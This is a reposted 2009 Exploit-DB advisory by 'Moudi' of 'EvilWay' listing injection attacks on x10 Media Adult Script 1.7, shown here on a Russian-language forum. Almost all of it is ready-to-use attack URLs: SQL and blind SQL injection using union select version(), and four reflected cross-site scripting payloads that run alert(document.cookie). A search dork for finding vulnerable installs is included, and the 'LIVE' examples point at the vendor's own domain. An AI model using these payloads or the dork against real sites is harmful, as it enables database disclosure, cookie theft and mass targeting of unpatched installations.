- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9340
- Проверка EDB
-
- Пройдено
- Автор
- MOUDI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4730 cve-2009-4729
- Дата публикации
- 2009-08-03
Код:
###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
[»] x10 Media Adult Script 1.7 Multiple Remote Vulnerabilities
==============================================================================
[»] Script: [ x10 Media Adult Script 1.7 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.x10media.com/media-script ]
[»] Founder: [ Moudi <[email protected]> ]
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
[»] Team: [ EvilWay ]
[»] Dork: [ Powered By x10media.com ]
[»] Price: [ $45.99 USD ]
[»] Site : [ https://security-shell.ws/forum.php ]
###########################################################################
===[ Exploit + LIVE : SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/report.php?id=[SQL]
[»] http://www.x10media.com/adult/report.php?id=null+union+select+version()
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===
[»] http://www.site.com/patch/report.php?id=[BLIND]
[»] http://www.x10media.com/adult/report.php?id=77917 and 1=null+union+select+version()
===[ Exploit XSS + LIVE : vulnerability ]===
[»] http://www.site.com/patch/includes/video_ad.php?pic_id=[XSS]
[»] http://www.site.com/patch/linkvideos_listing.php?category=[XSS]
[»] http://www.site.com/patch/templates/header1.php?id=[XSS]
[»] http://www.site.com/patch/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]
[»] http://www.x10media.com/adult/includes/video_ad.php?pic_id="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/linkvideos_listing.php?category="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/templates/header1.php?id="><script>alert(document.cookie);</script>
[»] http://www.x10media.com/adult/video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);</script>
Author: Moudi
###########################################################################
# milw0rm.com [2009-08-03]
- Источник
- www.exploit-db.com